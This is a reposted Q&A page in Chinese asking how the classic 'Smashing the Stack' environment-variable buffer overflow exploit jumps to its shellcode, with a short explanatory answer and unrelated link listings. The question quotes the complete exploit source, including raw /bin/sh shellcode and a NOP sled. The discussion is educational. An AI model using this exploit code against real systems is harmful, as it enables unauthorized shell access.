c - 缓冲区溢出与环境变量-6ren

c - 缓冲区溢出与环境变量

转载作者：太空宇宙更新时间：2023-11-04 03:53:11

24

4

我无法理解下面显示的 Smashing the Stack for Fun and Profit 中的一个漏洞。在此漏洞利用中，一些 shellcode 存储在名为 EGG 的环境变量中，变量的地址在存储在 RET 中的缓冲区中重复。然后使用 RET 调用我们希望利用的程序，这应该会导致程序跳转到 EGG。任何人都可以解释如何跳转到 EGG 吗？看起来 RET 填充的是 %esp 的地址，而不是 EGG。

#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}

最佳答案

您知道该程序在现代 PC 上无法轻松运行吗？因为在现代 pc 中应用了很多堆栈保护机制，如 NX、ASLR 等。当他们编写上述程序时，情况并非如此。当时对于每个进程，堆栈都位于相同的内存位置。

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

上面的代码将返回一个较低的内存地址，该地址假定为“受害者代码的缓冲区将略高于该地址!”因此，当我们尝试使用不同偏移量作为参数的受害者代码时，可能会出现“返回地址 = Shellcode 地址”!然后shellcode开始执行!你会产生一个壳!

而 EGG 只是您的环境变量的名称。 putenv() 需要一个“name=string”形式的字符串。当你执行受害者进程时，你将 $EGG 放入堆栈中，这就是为什么 RET 被 %esp 填充的原因。希望你明白了。

关于c - 缓冲区溢出与环境变量，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/19229531/

24

4

0

文章推荐： c - 覆盖 printf 语句中的字符以实现 snake

文章推荐： linux - 获取 Red Hat Linux 的 CD-R 的 SCSI id

文章推荐： c - 搜索 char** 类型的字符串

文章推荐：使用 c 中的 memcpy 将多个结构复制到缓冲区中

javascript - 使用流异步读取文件时如何同步处理每一行/缓冲区
这个问题在这里已经有了答案: Possible to make an event handler wait until async / Promise-based code is done? (2
emacs - 夫妇一起在emacs中的Windows/缓冲区？
我经常有多个运行的进程(R，Python，eshell/shell)，对于每个进程，我经常都有一个相关的脚本，可以从中发送摘要。为此，我通常将每个框架垂直地分成两个窗口，以便脚本文件(例如.py)位于
关闭缓冲区后显示的 Emacs 缓冲区
如何修改 emacs 在关闭缓冲区后选择要显示的缓冲区的方式？当我有多个列显示相同的缓冲区，然后在其中一个缓冲区中打开另一个文件，然后关闭新打开的缓冲区时，它不会切换回前一个缓冲区，而是切换到另一个
vim 复制命令到剪贴板/缓冲区
如何将 ex 命令复制到剪贴板或粘贴到缓冲区？在 Windows 上使用 gvim。最佳答案 windows剪贴板可以通过the buffer + 访问.因此，可以使用 + 将剪贴板粘贴为前命令。
来自多个变量的 javascript 缓冲区
在 javascript 中如何以比以下更简单的方式获取 b 缓冲区？ var num=6553599 var a = new Buffer(4); a.writeInt32LE(num)
OpenGL - 缓冲区、着色器
每次我在 Google 上搜索有关 OpenGL 编程的文章时，我都会找到一些文章，但似乎所有文章都提到了着色器和缓冲区。那些是什么？你能解释其中的一些吗: 深度缓冲区模板缓冲区像素着色器帧缓冲
java - Java中的流、缓冲区
我有java考试，当我学习时，我看到了这个练习，我尝试解决它，但我发现一些困难，所以请帮助我考虑实用程序中方法的以下注释、 header 和部分代码名为 Atbash 的加密类。 /**
OpenGL - 缓冲区、着色器
每次我在 Google 上搜索有关 OpenGL 编程的文章时，我都会找到一些文章，但似乎所有文章都提到了着色器和缓冲区。那些是什么？你能解释其中的一些吗: 深度缓冲区模板缓冲区像素着色器帧缓冲
OpenGL 缓冲区 - 跨步与紧密封装
对于每个属性使用跨步顶点缓冲区与紧密打包缓冲区有何优缺点？我的意思是例如: 步幅:xyzrgb xyzrgb xyzrgb 紧:xyzxyzxyz rgbrgbrgb 乍一看，使用步幅时您似乎可以轻松
Java - 缓冲区 - 我的代码在读取时跳过文本文件的最后一行
我正在尝试将文本文件中每行的数字读取到 ArrayList 中。当我执行以下函数时，它总是跳过最后一个元素。有人可以帮我吗？因为我在这里没有遇到问题，因为它读取直到缓冲区为空，所以他应该在到达 Fil
将结构复制到 char 缓冲区
#include #include int main () { time_t time_raw_format; struct tm * ptr_time; char *buff
将结构复制到 char* 缓冲区
基本上我有一个包含不同类型数据的自定义结构。例如: typedef struct example_structure{ uint8_t* example_1[4]; int example_2[4];
Android ListView 缓冲区
我之前的列表实现是一个简单的 LinearLayout，位于一个装满我的项目的 ScrollView 中。我切换到 ListView 的 Android 实现以简单地使用 CursorAdapter
javascript - 响应式框架中的滑动窗口/缓冲区
我想创建一个可变长度的输入事件窗口/缓冲区，当它接收到额外的事件时会变长。这是为了实现“键入时搜索”功能。我想捕获点击，但为了不给服务器造成压力，我想明智地进行服务调用。我想到的逻辑是缓冲击键，从
复制 yuv420 缓冲区
我想将 yuv420P 像素写入缓冲区而不是二进制文件。假设我在指针中存储了 luma 、 Cb 和 Cr。 luma = output_pixel.luma; cb = output_pixel.c
具有并发读者的 Golang 缓冲区
我想在 Go 中构建一个支持多个并发读取器和一个写入器的缓冲区。所有写入缓冲区的内容都应由所有读者读取。允许新读者随时加入，这意味着已经写入的数据必须能够为迟到的读者回放。缓冲区应满足以下接口(in
没吃透Netty 缓冲区，还能算得上Java老司机？
本文转载自微信公众号「小明菜市场」，作者小明菜市场。转载本文请联系小明菜市场公众号。前言 Java NIO 需要理解的主要有缓冲区，通道，选择器，这三个主要的部分。基础
NIO 数据存储结构——缓冲区 Buffer
一点睛 NIO，可以称为 New IO 或 Non Blocking IO，是在 JDK 1.4 后提供的新 API。传统的I/O 是阻塞式的 I/O、面向流的操作；而 NIO 是非阻塞 I/O 、
vim - 如何切换到包含特定模式的 vim 缓冲区
我正在寻找一种切换到包含搜索文本的缓冲区的方法。例如。如果我打开了 100 个缓冲区，我想切换到一个包含 'fooBar = 1' 的缓冲区最佳答案我写了一个 Vim 插件来做到这一点:buff
video - 将帧插入 FFmpeg 缓冲区
我正在尝试将提取的视频帧(我使用 ffmpeg)推送到 FFMPEG 缓冲区中。我已经查看了 ffmpeg 的缓冲区源文件，例如 buffersrc.c 和 fifo.c，以确定我是否可以这样做，但我

首页

博学

6Ren·AI

商城

c - 缓冲区溢出与环境变量